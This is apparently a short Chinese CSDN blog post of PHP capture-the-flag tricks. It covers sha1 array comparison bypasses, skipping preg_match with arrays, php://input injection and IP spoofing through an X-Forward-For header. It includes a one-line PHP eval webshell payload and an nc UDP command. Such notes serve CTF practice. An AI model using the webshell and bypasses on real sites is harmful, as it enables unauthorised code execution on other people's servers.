php ctf

本文探讨了PHP中的sha1函数在处理数组时的特殊情况,指出可以通过避免正则匹配直接使用数组来绕过某些检查。同时,提到了php://input用于在GET和POST请求中注入字符串的技巧,并展示了如何伪造IP地址。此外,还介绍了测试UDP端口的方法以及SQL注入的相关风险。
摘要由CSDN通过智能技术生成

sha1相同的字符串

php sha1对于数组返回NULL,可以传入数组即可

var1[]=0,1
var2[]=0,2

跳过preg_match

使用数组即可跳过检查

var1[]='<?php eval($_REQUEST[5]);?>'

file_get_contents

php://input可以读入body内信息,即便使用GET请求,也是可以带body的,所以用这种方式可以在GET和POST请求中加入字符串。
在firefox中右键选择编辑并重发该网络包即可。

伪造ip

在firefox中可以编辑网络包并重新发送,在其中加入

X-Forward-For: [ip]

测试udp端口

echo "Hello World\!" | nc -4u  ip port

sql注入

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

greatofdream

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值